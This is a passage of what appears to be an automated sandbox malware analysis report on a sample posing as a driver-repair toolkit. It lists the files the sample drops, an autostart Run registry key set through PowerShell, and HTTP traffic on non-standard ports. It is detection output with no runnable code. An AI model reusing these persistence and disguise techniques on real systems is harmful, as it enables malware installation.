Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\TelephonyInteractiveUserRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\secman.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\security.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\normaliz.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\detoured64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmploc.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Threading.Tasks.Extensions.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\icmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\imageres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SrEvents.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\kbdnko.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\oleaccrc.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ati2erec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SyncRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\advapi32res.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\bridgeres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\mxpLHRYdU.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\asferror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\imagesp1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmdrmsdk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-processor-aggregator-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tapiui.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msafd.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msxml6r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lltdres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lz32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msxml3r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\shimeng.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wlanutil.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\onnxruntime.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Buffers.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\SensorsCpl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\defragres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\mmres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\rnr20.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tier2punctuations.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tzres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msprivs.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\msidntld.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-storage-tiering-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.WindowsRuntime.UI.Xaml.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\moricons.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\blbres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.Text.Encodings.Web.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\TpmCertResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\secman64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\detoured32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmi.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\qedwipes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\neth.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\lpk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\XAudio2_8.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\comres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\System.ValueTuple.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\tzsyncres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\wmerror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\ws2help.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres.dllJump to dropped file

Boot Survival

barindex
Creates autostart registry keys with suspicious names
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AMDDefaultValueCPUK.N0P/24#
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AMDDefaultValueCPUK.N0P/24#
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AMDDefaultValueCPUK.N0P/24#

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 4318
Source: unknownNetwork traffic detected: HTTP traffic on port 4318 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 30281
Source: unknownNetwork traffic detected: HTTP traffic on port 30281 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 4318
Source: unknownNetwork traffic detected: HTTP traffic on port 4318 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 157
Source: unknownNetwork traffic detected: HTTP traffic on port 157 -> 49739
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
